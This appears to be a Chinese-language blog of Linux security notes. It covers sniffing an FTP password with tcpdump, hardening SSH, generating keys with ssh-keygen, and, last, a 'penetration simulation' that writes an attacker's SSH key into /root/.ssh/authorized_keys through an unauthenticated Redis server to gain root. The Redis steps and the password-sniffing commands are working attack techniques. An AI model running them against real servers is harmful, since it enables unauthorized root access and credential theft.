tcpdump密码嗅探_tag

tcpdump密码嗅探

在ftp server 监听 网卡eth0 上的 21 端口
tcpdump -i eth0 -nn -X 'port 21'

在client login

然后回来就可以看到了

此处省略

0x0020: 5018 3908 846a 0000 3232 3020 2876 7346 P.9..j..220.(vsF
0x0030: 5450 6420 322e 322e 3229 0d0a TPd.2.2.2)..
11:58:48.817338 IP 192.168.1.45.50807 > 192.168.1.190.21: Flags [P.], seq 1:12, ack 21, win 64220, length 11

此处省略
11:58:48.817338 IP 192.168.1.45.50807 > 192.168.1.190.21: Flags [P.], seq 1:12, ack 21, win 64220, length 11
0x0000: 4500 0033 4bbd 4000 8006 2acc c0a8 012d E..3K.@…*….-
0x0010: c0a8 01be c677 0015 3f3d 8a16 8498 c78c …..w..?=……
0x0020: 5018 fadc ac0e 0000 5553 4552 2072 6f6f P…….USER.roo
0x0030: 740d 0a t..
11:58:48.817345 IP 192.168.1.190.21 > 192.168.1.45.50807: Flags [.], ack 12, win 14600, length 0
0x0000: 4500 0028 cefd 4000 4006 e796 c0a8 01be E..(..@.@…….
0x0010: c0a8 012d 0015 c677 8498 c78c 3f3d 8a21 …-…w….?=.!
0x0020: 5010 3908 1680 0000 P.9…..
11:58:48.817443 IP 192.168.1.190.21 > 192.168.1.45.50807: Flags [P.], seq 21:55, ack 12, win 14600, length 34
0x0000: 4500 004a cefe 4000 4006 e773 c0a8 01be E..J..@.@..s….
0x0010: c0a8 012d 0015 c677 8498 c78c 3f3d 8a21 …-…w….?=.!
0x0020: 5018 3908 8478 0000 3333 3120 506c 6561 P.9..x..331.Plea
0x0030: 7365 2073 7065 6369 6679 2074 6865 2070 se.specify.the.p
0x0040: 6173 7377 6f72 642e 0d0a assword…
11:58:48.817564 IP 192.168.1.45.50807 > 192.168.1.190.21: Flags [P.], seq 12:25, ack 55, win 64186, length 13
0x0000: 4500 0035 4bbe 4000 8006 2ac9 c0a8 012d E..5K.@…*….-
0x0010: c0a8 01be c677 0015 3f3d 8a21 8498 c7ae …..w..?=.!….
0x0020: 5018 faba ea5a 0000 5041 5353 2031 3233 P….Z..PASS.123
0x0030: 3435 360d 0a 456..

此处省略

可见 ftp软件为 vsftp ftp 用户是root 密码为123456

Linux启动或禁止SSH用户及IP的登录

1:Linux启动或禁止SSH root用户的登录

vi /etc/ssh/sshd_config
#yes 就是可以使用SSH方式的root登录
#no就是禁止使用SSH方式的root登录
PermitRootLogin no

2:Linux限制SSH用户

AllowUsers evan

evan是我操作系统的用户,如果没有用户可以手动添加AllowUsers

启动或禁止用户IP登录
/etc/hosts.allow配置文件,设置允许登录的IP
sshd:192.168.220.164

/etc/hosts.deny文件,设置sshd:ALL

参考
http://blog.csdn.net/linghe301/article/details/8211305

ssh-keygen 基本用法

ssh-keygen 基本用法

生成ssh key的时候,可以通过 -f 选项指定生成文件的文件名,如下
[root@a]$ ssh-keygen -f test -C "test key"
~~文件名 ~~~~ 备注
如果没有指定文件名,会询问你输入文件名:
[ root@a]$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/evan/.ssh/id_rsa):
你可以输入你想要的文件名,这里我们输入test。

密码 私key 文件的密码
之后,会询问你是否需要输入密码。输入密码之后,以后每次都要输入密码。请根据你的安全需要决定是否需要密码,如果不需要,直接回车:

#这种办法更加方便
或者 -t type 指定要创建的密钥类型。可以使用:”rsa1″(SSH-1) “rsa”(SSH-2) “dsa”(SSH-2)
[root@a]$ ssh-keygen -t rsa -f test -C "test key"
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
结果

如果文件名是test,结果是:
[root@a]$ ll test*
-rw——- 1 huqiu huqiu 1675 Sep 15 13:24 test
-rw-r–r– 1 huqiu huqiu 390 Sep 15 13:24 test.pub
备注

上面生成的命令中,-C选项是公钥文件中的备注:

[root@a]$ cat test.pub
ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAQEAlgjiMw7AskxbvpQY9rmZPQxQBzh9laxFvbaini2EgmQkNsXBA9WJOXn2YBJauoiVsdUKBWA97avjsobrTxsCYvFr1yQQvTfTlbqlqGNIhQc/3HjTl2pIkClpDWvBrRN+jpyESS4MNbfOL1qjT4c/QhGvj6U6HrN6kUyn58oyyJpTzOLG74AZELJ2Led57QvTw1yJXZuAMWioR0A3BGd25fdocLX3ebux6ya8AsloOVYfsAqGlggrARe6FXjLfMH4a/nxaAdiDYVXU/Vr1ybK9P7SfyEDGJi3JtgiPUlA6vPxUC
E+9IJPQaqqeqCGzrJ6G/XO7om1v9YLLG/H/ZN2tQ== test key
~~~~备注
文件的权限

为了让私钥文件和公钥文件能够在认证中起作用,请确保权限正确。
对于.ssh 以及父文件夹,当前用户用户一定要有执行权限,其他用户最多只能有执行权限。
对于公钥和私钥文件也是: 当前用户一定要有执行权限,其他用户最多只能有执行权限。
对于利用公钥登录,对其他用户配置执行权限是没有问题的。但是对于git,公钥和私钥, 以及config等相关文件的权限,其他用户不可有任何权限。
authorized_keys

ssh-keygen 基本用法

https://wiki.archlinux.org/index.php/SSH_keys_(%E7%AE%80%E4%BD%93%E4%B8%AD%E6%96%87)

ssh-keygen 中文手册

利用redis安装漏洞入侵系统的一次渗透模拟

原因 默认 redis 安装存在漏洞,用root启动redis 可以直接 获取 root 权限,而如果服务器又是用root 直接远程登录的 那就受伤了 哥曾经差点受伤

ssh-keygen -t rsa

然后将公钥写入foo.txt文件
cd .ssh ;
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

再连接Redis写入文件
cat foo.txt | redis-cli -h 192.168.1.10 -x set crackit
redis-cli -h 192.168.1.10

192.168.1.10:6379> config set dir /root/.ssh/
OK
$ 192.168.1.10:6379> config get dir
1) “dir”
2) “/root/.ssh”
$ 192.168.1.10:6379> config set dbfilename "authorized_keys"
OK
$ 192.168.1.10:6379> save
OK

这样就可以成功的将自己的公钥写入/root/.ssh文件夹的authotrized_keys文件里,然后攻击者直接执行:
即可远程利用自己的私钥登录该服务器。
ssh -i id_rsa root@192.168.1.10

当然,写入的目录不限于/root/.ssh 下的authorized_keys,也可以写入用户目录,不过Redis很多以root权限运行,所以写入root目录下,可以跳过猜用户的步骤。

默认 redis 安装存在漏洞, 可以直接 获取 root 权限

Redis 未授权访问缺陷可轻易导致系统被黑